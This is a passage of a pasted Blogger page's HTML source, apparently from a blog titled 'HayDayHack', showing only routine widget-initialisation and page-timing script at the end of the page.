  823. if (typeof(BLOG_attachCsiOnload) != 'undefined' && BLOG_attachCsiOnload != null) { window['blogger_templates_experiment_id'] = "templatesV1";window['blogger_blog_id'] = '2650666066160479665';BLOG_attachCsiOnload(''); }_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d2650666066160479665','//haydaysample.blogspot.ro/','2650666066160479665');
  824. _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '2650666066160479665', 'bloggerUrl': 'http://www.blogger.com', 'title': 'HayDayHack', 'pageType': 'index', 'url': 'http://haydaysample.blogspot.ro/', 'canonicalUrl': 'http://haydaysample.blogspot.com/', 'canonicalHomepageUrl': 'http://haydaysample.blogspot.com/', 'homepageUrl': 'http://haydaysample.blogspot.ro/', 'blogspotFaviconUrl': 'http://haydaysample.blogspot.ro/favicon.ico', 'enabledCommentProfileImages': true, 'adultContent': false, 'disableAdSenseWidget': false, 'analyticsAccountNumber': '', 'searchLabel': '', 'searchQuery': '', 'pageName': '', 'pageTitle': 'HayDayHack', 'encoding': 'UTF-8', 'locale': 'ro', 'localeUnderscoreDelimited': 'ro', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'languageDirection': 'ltr', 'feedLinks': '\74link rel\75\42alternate\42 type\75\42application/atom+xml\42 title\75\42HayDayHack - Atom\42 href\75\42http://haydaysample.blogspot.com/feeds/posts/default\42 /\76\n\74link rel\75\42alternate\42 type\75\42application/rss+xml\42 title\75\42HayDayHack - RSS\42 href\75\42http://haydaysample.blogspot.com/feeds/posts/default?alt\75rss\42 /\76\n\74link rel\75\42service.post\42 type\75\42application/atom+xml\42 title\75\42HayDayHack - Atom\42 href\75\42http://www.blogger.com/feeds/2650666066160479665/posts/default\42 /\76\n', 'meTag': '\74link rel\75\42me\42 href\75\42http://www.blogger.com/profile/07081788521771553593\42 /\76\n', 'openIdOpTag': '\74link rel\75\42openid.server\42 href\75\42http://www.blogger.com/openid-server.g\42 /\76\n\74link rel\75\42openid.delegate\42 href\75\42http://haydaysample.blogspot.com/\42 /\76\n', 'latencyHeadScript': '\74script type\75\42text/javascript\42\76(function() { var b\75window,f\75\42chrome\42,g\75\42jstiming\42,k\75\42tick\42;(function(){function d(a){this.t\75{};this.tick\75function(a,d,c){var e\75void 0!\75c?c:(new Date).getTime();this.t[a]\75[e,d];if(void 0\75\75c)try{b.console.timeStamp(\42CSI/\42+a)}catch(h){}};this[k](\42start\42,null,a)}var a;b.performance\46\46(a\75b.performance.timing);var n\75a?new d(a.responseStart):new d;b.jstiming\75{Timer:d,load:n};if(a){var c\75a.navigationStart,h\75a.responseStart;0\74c\46\46h\76\75c\46\46(b[g].srt\75h-c)}if(a){var e\75b[g].load;0\74c\46\46h\76\75c\46\46(e[k](\42_wtsrt\42,void 0,c),e[k](\42wtsrt_\42,\42_wtsrt\42,h),e[k](\42tbsd_\42,\42wtsrt_\42))}try{a\75null,\nb[f]\46\46b[f].csi\46\46(a\75Math.floor(b[f].csi().pageT),e\46\0460\74c\46\46(e[k](\42_tbnd\42,void 0,b[f].csi().startE),e[k](\42tbnd_\42,\42_tbnd\42,c))),null\75\75a\46\46b.gtbExternal\46\46(a\75b.gtbExternal.pageT()),null\75\75a\46\46b.external\46\46(a\75b.external.pageT,e\46\0460\74c\46\46(e[k](\42_tbnd\42,void 0,b.external.startE),e[k](\42tbnd_\42,\42_tbnd\42,c))),a\46\46(b[g].pt\75a)}catch(p){}})();b.tickAboveFold\75function(d){var a\0750;if(d.offsetParent){do a+\75d.offsetTop;while(d\75d.offsetParent)}d\75a;750\76\75d\46\46b[g].load[k](\42aft\42)};var l\75!1;function m(){l||(l\75!0,b[g].load[k](\42firstScrollTime\42))}b.addEventListener?b.addEventListener(\42scroll\42,m,!1):b.attachEvent(\42onscroll\42,m);\n })();\74/script\076', 'mobileHeadScript': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/76f25a6f2e06af76', 'plusOneApiSrc': 'https://apis.google.com/js/plusone.js', 'sf': 'n'}}, {'name': 'skin', 'data': {'vars': {}, 'override': ''}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\75classic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\75flipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\75magazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\75mosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\75sidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\75snapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\75timeslide'}}}]);
  825. </script>
  826. </body>
  827. <div class='section' id='x00srch'></div>
  828. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement